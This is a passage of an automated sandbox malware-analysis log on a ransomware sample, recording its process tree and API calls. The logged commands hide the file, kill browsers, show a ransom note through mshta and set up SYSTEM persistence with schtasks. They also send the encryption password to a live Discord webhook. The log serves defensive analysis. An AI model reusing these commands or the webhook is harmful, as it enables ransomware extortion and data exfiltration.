Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A7652218_2_00A76522
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AC066518_2_00AC0665
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A7267E18_2_00A7267E
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A6283A18_2_00A6283A
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A5684318_2_00A56843
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A789DF18_2_00A789DF
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A76A9418_2_00A76A94
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AC0AE218_2_00AC0AE2
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A58A0E18_2_00A58A0E
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A9EB0718_2_00A9EB07
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AA8B1318_2_00AA8B13
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A6CD6118_2_00A6CD61
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A7700618_2_00A77006
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A5319018_2_00A53190
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A5710E18_2_00A5710E
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A4128718_2_00A41287
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A6F41918_2_00A6F419
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A5568018_2_00A55680
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A616C418_2_00A616C4
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A558C018_2_00A558C0
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A678D318_2_00A678D3
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A61BB818_2_00A61BB8
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A79D0518_2_00A79D05
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A6BFE618_2_00A6BFE6
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A61FD018_2_00A61FD0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe B116FF00546620A598119D6704E9849393D2F9948FC8888D6DDF6211AA5B80B9
Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe B116FF00546620A598119D6704E9849393D2F9948FC8888D6DDF6211AA5B80B9
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: String function: 00A47F41 appears 35 times
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: String function: 00A60D27 appears 70 times
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: String function: 00A68B40 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: String function: 00390D27 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: String function: 00377F41 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: String function: 00398B40 appears 42 times
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: String function: 0040DEF0 appears 38 times
Source: SuperEnjoy.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aescrypt.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: aescrypt.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiscordSendWebhook.exe.14.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SuperEnjoy.exe, 00000001.00000002.669036281.0000000002320000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SuperEnjoy.exe
Source: SuperEnjoy.exe, 00000001.00000002.669734074.0000000002440000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SuperEnjoy.exe
Source: SuperEnjoy.exe, 00000001.00000002.669734074.0000000002440000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SuperEnjoy.exe
Source: SuperEnjoy.exe, 0000000E.00000002.673097740.00000000017A0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SuperEnjoy.exe
Source: SuperEnjoy.exe, 0000000E.00000002.673097740.00000000017A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SuperEnjoy.exe
Source: SuperEnjoy.exe, 0000000E.00000002.671969977.00000000016B0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SuperEnjoy.exe
Source: SuperEnjoy.exeBinary or memory string: OriginalFilenameNewRealisticSoftware: vs SuperEnjoy.exe
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: SuperEnjoy.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engineClassification label: mal80.evad.winEXE@680/11@3/2
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DA2D5 GetLastError,FormatMessageW,5_2_003DA2D5
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003C8713 AdjustTokenPrivileges,CloseHandle,5_2_003C8713
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003C8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,5_2_003C8CC3
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A98713 AdjustTokenPrivileges,CloseHandle,18_2_00A98713
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A98CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,18_2_00A98CC3
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,5_2_003DB59E
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003EF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,5_2_003EF121
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003CDA5D CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode,5_2_003CDA5D
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004026B8 LoadResource,SizeofResource,FreeResource,1_2_004026B8
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\cryptormsg.htaJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6288:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_01
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile created: C:\Users\user\AppData\Local\Temp\EEFC.tmpJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.bat C:\Users\user\Desktop\SuperEnjoy.exe'
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;opera.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;firefox.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;iexplore.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;explorer.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;opera.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;firefox.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;iexplore.exe&quot;)
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;explorer.exe&quot;)
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: SuperEnjoy.exeVirustotal: Detection: 35%
Source: unknownProcess created: C:\Users\user\Desktop\SuperEnjoy.exe 'C:\Users\user\Desktop\SuperEnjoy.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.bat C:\Users\user\Desktop\SuperEnjoy.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib C:\Users\user\Desktop\SuperEnjoy.exe +r +s +h
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exe
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\cryptormsg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exe
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':satellite: New Crypt from user, Password: nlhgQrx0YClnVSjR, FakeAccount: 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: unknownProcess created: C:\Users\user\Desktop\SuperEnjoy.exe C:\Users\user\Desktop\SuperEnjoy.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Windows\Temp\1810.tmp\1811.tmp\1812.bat C:\Users\user\Desktop\SuperEnjoy.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\attrib.exe attrib C:\Users\user\Desktop\SuperEnjoy.exe +r +s +h
Source: unknownProcess created: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe 'C:\Windows\Temp\1810.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir * /a-D /s /b | findstr /I /V /C:'^$'
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' dir * /a-D /s /b '
Source: unknownProcess created: C:\Windows\System32\findstr.exe findstr /I /V /C:'^$'
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exe
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exe
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Windows\system32\config\systemprofile\cryptormsg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: unknownProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exe
Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'
Source: C:\Users\user\Desktop\SuperEnjoy.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.bat C:\Users\user\Desktop\SuperEnjoy.exe'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib C:\Users\user\Desktop\SuperEnjoy.exe +r +s +hJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4KJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\cryptormsg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':satellite: New Crypt from user, Password: nlhgQrx0YClnVSjR, FakeAccount: 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4KJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir * /a-D /s /b | findstr /I /V /C:'^$'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
